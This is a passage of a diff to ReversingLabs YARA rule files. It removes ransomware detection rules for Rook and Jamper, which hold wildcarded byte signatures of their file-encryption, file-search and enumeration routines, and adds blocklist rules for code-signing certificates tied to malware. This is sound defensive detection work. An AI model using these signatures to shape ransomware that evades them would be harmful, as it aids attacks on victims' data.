?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 - ?? EB ?? 8D 4D ?? 51 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? - 8B 55 ?? 46 83 C7 ?? 3B F2 0F 82 ?? ?? ?? ?? 8B 45 ?? 8B 75 ?? 3B 45 ?? 0F 84 ?? ?? - ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 46 ?? 83 7D ?? ?? - 8B 7D ?? 89 45 ?? 8D 45 ?? 0F 43 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? - ?? ?? ?? ?? ?? 89 45 ?? 83 FF ?? 73 ?? 0F 10 00 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 11 - 85 ?? ?? ?? ?? EB ?? 8B F7 8D 8D ?? ?? ?? ?? B8 ?? ?? ?? ?? 83 CE ?? 3B F0 0F 47 F0 - } - $enum_shares_p3 = { - 8D 46 ?? 50 E8 ?? ?? ?? ?? 8D 0C 7D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 51 FF 75 ?? 50 E8 - ?? ?? ?? ?? 83 C4 ?? 89 B5 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 8B 7D - ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? - 3B F8 0F 84 ?? ?? ?? ?? 2B C7 C1 F8 ?? 69 F0 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 89 85 ?? - ?? ?? ?? 8D 0C 76 89 45 ?? 8D 04 C8 89 45 ?? 8D 85 ?? ?? ?? ?? 89 45 ?? C6 45 ?? ?? - 0F 57 C0 8B B5 ?? ?? ?? ?? 66 0F D6 45 ?? C7 45 ?? ?? ?? ?? ?? 89 75 ?? 89 75 ?? 89 - 45 ?? C6 45 ?? ?? 66 90 57 8B CE E8 ?? ?? ?? ?? 83 C6 ?? 83 C7 ?? 89 75 ?? 3B 7D ?? - 75 ?? 89 75 ?? C6 45 ?? ?? 89 75 ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D - 85 ?? ?? ?? ?? 8B 4D ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? - E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 75 ?? FF 76 ?? E8 ?? - ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? EB ?? - 8B 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 06 F0 FF 08 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? - ?? EB ?? 57 FF 15 ?? ?? ?? ?? 8B 75 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Web Nexus d.o.o." and pe.signatures[i].serial=="21:b9:91" and 1125477041<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_1Cc37De5Dbed097F98F56Dbc : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "8c362133-a30f-599d-88e0-a1448433178a" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15260-L15276" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a2d04275b9fe37308c8f1dca75f4cc3c4a8985930f901e1f46e3ddc2977eea32" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ( all of ($enum_shares_p*)) and ($find_files) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="1c:c3:7d:e5:db:ed:09:7f:98:f5:6d:bc" and 1476693977<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win64_Ransomware_Rook : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_50F66Ab0D7Ed19B69D48F635E69572Fa : INFO FILE { meta: - description = "Yara rule that detects Rook ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "60bbfd57-18bb-58b3-9abc-ab30943bbddd" - date = "2022-01-17" - modified = "2022-01-17" + id = "9938b4c5-4a2b-5f4a-92a0-28c3519b1ed3" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win64.Ransomware.Rook.yara#L1-L122" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "dc8b37e55b634de52855dd851dbaaf3e690adfb2e875d0e0c9ef5f4846c6ff30" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15278-L15294" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "28f71c0572e769d4a0cb289071912bc79cddfd98a3a8161c5400c7bee7090bf5" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Rook" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 48 2B D6 48 8D 4C 24 ?? 48 FF C2 41 B8 ?? ?? ?? ?? F6 D8 4D 1B FF 4C 23 FA 33 D2 E8 - ?? ?? ?? ?? 45 33 C9 89 7C 24 ?? 4C 8D 44 24 ?? 48 89 7C 24 ?? 33 D2 48 8B CE FF 15 - ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? 4D 8B CE 45 33 C0 33 D2 48 8B CE E8 ?? ?? ?? - ?? 8B F8 48 83 FB ?? 74 ?? 48 8B CB FF 15 ?? ?? ?? ?? 8B C7 48 8B 8C 24 ?? ?? ?? ?? - 48 33 CC E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5E 5F - 5E 5D C3 49 8B 6E ?? 49 2B 2E 48 C1 FD ?? 80 7C 24 ?? ?? 75 ?? 8A 44 24 ?? 84 C0 74 - ?? 3C ?? 75 ?? 40 38 7C 24 ?? 74 ?? 4D 8B CE 48 8D 4C 24 ?? 4D 8B C7 48 8B D6 E8 ?? - ?? ?? ?? 85 C0 75 ?? 48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 75 ?? 49 8B 06 - 49 8B 56 ?? 48 2B D0 48 C1 FA ?? 48 3B EA 0F 84 ?? ?? ?? ?? 48 2B D5 48 8D 0C E8 4C - 8D 0D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 - } - $encrypt_files_p1 = { - 40 55 53 56 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? F2 0F 10 05 ?? ?? ?? ?? 0F - B6 05 ?? ?? ?? ?? F2 0F 11 44 24 ?? 88 44 24 ?? E8 ?? ?? ?? ?? 33 D2 48 8D 0D ?? ?? - ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 83 CE ?? 48 8D 4C 24 ?? 89 35 ?? ?? ?? ?? - FF 15 ?? ?? ?? ?? 48 63 C8 4C 8D 4C 24 ?? 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 4C 24 - ?? FF 15 ?? ?? ?? ?? 48 63 C8 4C 8D 4C 24 ?? 48 89 4C 24 ?? E8 ?? ?? ?? ?? 0F 57 C0 - 0F 57 C9 F3 0F 7F 05 ?? ?? ?? ?? F3 0F 7F 0D ?? ?? ?? ?? F3 0F 7F 05 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 48 85 C0 48 89 05 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 0F 44 0D ?? ?? ?? - ?? 48 89 0D ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF C0 48 8D 15 ?? ?? - ?? ?? 4C 63 C0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8D 15 ?? - ?? ?? ?? 48 89 05 ?? ?? ?? ?? 33 DB 48 8B 05 ?? ?? ?? ?? 45 33 C9 48 89 05 ?? ?? ?? - ?? 45 33 C0 48 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 44 24 ?? 48 C7 - } - $encrypt_files_p2 = { - C1 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 5C 24 ?? C7 44 24 ?? ?? ?? - ?? ?? 89 5C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 - 8D 85 ?? ?? ?? ?? 4C 89 A4 24 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 44 24 ?? 4C 8D - 25 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 45 33 C9 45 33 C0 4C 89 64 24 ?? 4C 89 BC 24 - ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8D 2D ?? ?? ?? ?? 83 - F8 ?? 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 89 5C 24 ?? - E8 ?? ?? ?? ?? 85 C0 78 ?? 4C 63 C8 4C 8D 85 ?? ?? ?? ?? 48 8D 44 24 ?? 4D 2B C1 48 - 89 44 24 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 4C 89 64 24 ?? E8 ?? ?? ?? ?? - 49 8B CD FF 15 ?? ?? ?? ?? 44 8B C0 89 05 ?? ?? ?? ?? B8 ?? ?? ?? ?? 41 F7 E8 C1 FA - ?? 8B CA C1 E9 ?? 03 D1 69 CA ?? ?? ?? ?? 44 3B C1 74 ?? FF C2 4C 8D 3D ?? ?? ?? ?? - 85 D2 0F 8E ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 49 8B DD 4C 89 B4 24 ?? ?? ?? ?? 49 - } - $encrypt_files_p3 = { - 8B FF 44 8B F2 0F 1F 00 48 8B 0D ?? ?? ?? ?? 8B 91 ?? ?? ?? ?? 85 D2 74 ?? 83 FA ?? - 75 ?? 48 89 7C 24 ?? 4C 8D 05 ?? ?? ?? ?? 48 89 5C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 C7 - 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 48 89 7C 24 ?? 4C 8D 05 ?? ?? ?? ?? 48 89 - 5C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 81 C7 ?? - ?? ?? ?? 48 81 C3 ?? ?? ?? ?? 49 83 EE ?? 75 ?? 4C 8B B4 24 ?? ?? ?? ?? 33 DB 48 8B - BC 24 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 48 FF C6 41 80 3C 34 ?? 75 ?? 48 8B 8D ?? ?? ?? - ?? 48 8D 15 ?? ?? ?? ?? 89 74 24 ?? 41 B9 ?? ?? ?? ?? 45 33 C0 4C 89 64 24 ?? FF 15 - ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? C7 44 24 ?? - ?? ?? ?? ?? 45 33 C0 4C 89 7C 24 ?? FF 15 ?? ?? ?? ?? EB ?? 48 8B 8D ?? ?? ?? ?? 48 - 8D 85 ?? ?? ?? ?? 48 89 44 24 ?? 4C 8D 3D ?? ?? ?? ?? 45 33 C9 4C 89 7C 24 ?? 45 33 - C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 49 8B CC FF - 15 ?? ?? ?? ?? 49 8B D4 48 8D 0D ?? ?? ?? ?? FF C0 4C 63 C0 E8 ?? ?? ?? ?? 48 8B 05 - ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ?? - ?? ?? 4C 8B BC 24 ?? ?? ?? ?? 4C 8B A4 24 ?? ?? ?? ?? 48 85 C0 74 ?? 48 8B 0D ?? ?? - ?? ?? FF 50 ?? 48 8B 05 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 33 D2 44 8D 42 ?? FF D0 48 - 8B 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 48 63 85 ?? ?? ?? ?? 48 3D ?? - ?? ?? ?? 73 ?? 0F 1F 00 48 63 85 ?? ?? ?? ?? 42 C6 04 28 ?? FF 85 ?? ?? ?? ?? 48 63 - 85 ?? ?? ?? ?? 48 3D ?? ?? ?? ?? 72 ?? 4C 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? - 5E 5B 5D C3 - } - $enum_procs = { - 40 56 48 81 EC ?? ?? ?? ?? 33 D2 8D 4A ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? C7 44 24 - ?? ?? ?? ?? ?? 48 8B C8 48 8B F0 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 89 9C - 24 ?? ?? ?? ?? 48 89 AC 24 ?? ?? ?? ?? 48 8D 2D ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? - 0F 1F 40 ?? 0F 1F 84 00 ?? ?? ?? ?? 33 DB 48 8B FD 66 66 66 0F 1F 84 00 ?? ?? 00 00 - 48 8B 0F 48 8D 54 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF C3 48 83 C7 ?? 83 FB ?? 72 - ?? EB ?? 44 8B 44 24 ?? 33 D2 8D 4A ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? BA - ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48 - 8B CE FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 8B BC 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? - 48 8B 9C 24 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5E C3 - } - $enum_shares = { - 48 83 EC ?? 33 D2 C7 44 24 ?? ?? ?? ?? ?? 48 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 4C - 8B C9 48 89 44 24 ?? 8D 4A ?? 44 8D 42 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? - 48 89 5C 24 ?? 8B 5C 24 ?? 48 89 7C 24 ?? 66 66 0F 1F 84 00 ?? ?? 00 00 48 8B 0D ?? - ?? ?? ?? 4C 8D 43 ?? BA ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 ?? 48 8B - 4C 24 ?? 4C 8D 4C 24 ?? 4C 8B C0 48 8D 54 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 66 0F - 1F 44 00 ?? 33 DB 39 5C 24 ?? 76 ?? 0F 1F 84 00 ?? ?? ?? ?? 48 8D 0C 5B 48 C1 E1 ?? - 48 03 CF F6 41 ?? ?? 74 ?? E8 ?? ?? ?? ?? EB ?? 48 8B 49 ?? E8 ?? ?? ?? ?? FF C3 3B - 5C 24 ?? 72 ?? 48 8B 4C 24 ?? 4C 8D 4C 24 ?? 4C 8B C7 48 8D 54 24 ?? FF 15 ?? ?? ?? - ?? 85 C0 74 ?? 48 8B 0D ?? ?? ?? ?? 4C 8B C7 33 D2 FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? - FF 15 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 8B 5C 24 ?? 48 83 C4 ?? C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Wei Liu" and pe.signatures[i].serial=="50:f6:6a:b0:d7:ed:19:b6:9d:48:f6:35:e6:95:72:fa" and 1467158400<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_11212F502836A784752160351Defb136Cf09 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "7609083d-145b-5594-a04b-72c2862873eb" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15296-L15312" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "63d4c1aaafdf6de14d0ae78035644cf6b0fefab8b0063d2566ca38af9f9498d2" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($enum_shares) and ($enum_procs) and ($find_files) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "EVANGEL TECHNOLOGY(HK) LIMITED" and pe.signatures[i].serial=="11:21:2f:50:28:36:a7:84:75:21:60:35:1d:ef:b1:36:cf:09" and 1463726573<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Jamper : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_2C16Be9A7Ce2A23Ab7A4B4Eb7Da3400C : INFO FILE { meta: - description = "Yara rule that detects Jamper ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "9ba9358e-8f67-5d0e-a9bc-b3b10cd3a8b2" - date = "2020-07-15" - modified = "2020-07-15" + id = "4e17aed7-fd76-549f-bcf7-84c97efc44e4" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Jamper.yara#L1-L110" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "826f8fa7cc92b279c609a9ab6a87c32940e37b4c2476854af75bbed29cb3eaf2" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15314-L15330" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "917f324cbe91718efc9b2f41ef947fa8f1a501dde319936774d702d57b1e6b37" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Jamper" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_p1 = { - 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D - ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 55 ?? - 89 45 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 DB 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 8B - 45 ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? - ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 - 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? - ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? - 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 6A ?? 8B 4D ?? B2 ?? A1 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 10 FF 12 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 83 - BD ?? ?? ?? ?? ?? 75 ?? 83 BD ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? EB ?? 0F 8E ?? ?? ?? - ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 76 ?? EB ?? 7E ?? C7 85 - ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 89 85 - ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 - ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 83 FB ?? 7F ?? B8 - } - $encrypt_files_p2 = { - E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 - ?? ?? ?? ?? 43 83 FB ?? 75 ?? 8B 85 ?? ?? ?? ?? 8B D0 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 - ?? E8 ?? ?? ?? ?? 8B D0 8B 8D ?? ?? ?? ?? 8B 45 ?? 8B 18 FF 53 ?? 83 BD ?? ?? ?? ?? - ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8D 45 ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? 8B 18 FF 53 ?? EB ?? 8D 45 ?? - E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 33 D2 8B 45 ?? 8B 08 FF 51 ?? 83 - BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 8D 45 ?? E8 ?? ?? ?? ?? - 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? 8B 18 FF 53 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9 - ?? ?? ?? ?? 8B 45 ?? 8B 18 FF 53 ?? 55 E8 ?? ?? ?? ?? 59 55 E8 ?? ?? ?? ?? 59 EB ?? - 55 E8 ?? ?? ?? ?? 59 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? 8B - 18 FF 53 ?? 55 E8 ?? ?? ?? ?? 59 B3 ?? 8D 45 ?? E8 ?? ?? ?? ?? 84 DB 74 ?? 8D 95 ?? - ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B - F8 57 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 56 57 E8 ?? ?? ?? ?? 33 C0 5A 59 59 - 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 - } - $find_files = { - 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 89 55 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 68 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? - ?? 89 C3 85 DB 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 FF D3 85 C0 74 - ?? 8B 45 ?? 50 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 - ?? 80 38 ?? 75 ?? 8B 45 ?? 80 78 ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? E8 ?? ?? - ?? ?? 8B F0 80 3E ?? 0F 84 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F0 80 3E ?? 0F 84 - ?? ?? ?? ?? EB ?? 8B 75 ?? 83 C6 ?? 8B DE 2B 5D ?? 8D 43 ?? 50 8B 45 ?? 50 8D 85 ?? - ?? ?? ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F8 8B C7 2B C6 - 03 C3 40 3D ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 8B C7 2B C6 40 50 56 8D 85 ?? ?? ?? ?? 03 - C3 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 89 45 - ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? - 8D 53 ?? 03 C2 40 3D ?? ?? ?? ?? 7F ?? C6 84 1D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B C3 - 48 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 03 C3 40 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? 50 E8 ?? ?? ?? ?? 40 03 D8 8B F7 80 3E ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 8D 85 - ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3 - } - $enum_resources = { - 55 8B EC 83 C4 ?? 53 56 57 33 D2 89 55 ?? 89 55 ?? 89 55 ?? 33 D2 55 68 ?? ?? ?? ?? - 64 FF 32 64 89 22 33 D2 55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 8D 55 ?? 52 50 6A ?? 6A - ?? 6A ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 33 C0 5A 59 59 64 89 10 E9 ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 6A ?? E8 ?? ?? ?? ?? 89 - 45 ?? 8D 45 ?? 50 8B 45 ?? 50 8D 45 ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D - ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 48 85 C0 0F 82 ?? ?? ?? ?? 40 89 45 ?? 8B 45 ?? 8B - 58 ?? 85 DB 0F 84 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? 8B - D3 E8 ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? 0F B6 12 88 50 ?? C6 00 ?? 8D 55 ?? 8D 45 ?? E8 - ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? 0F B6 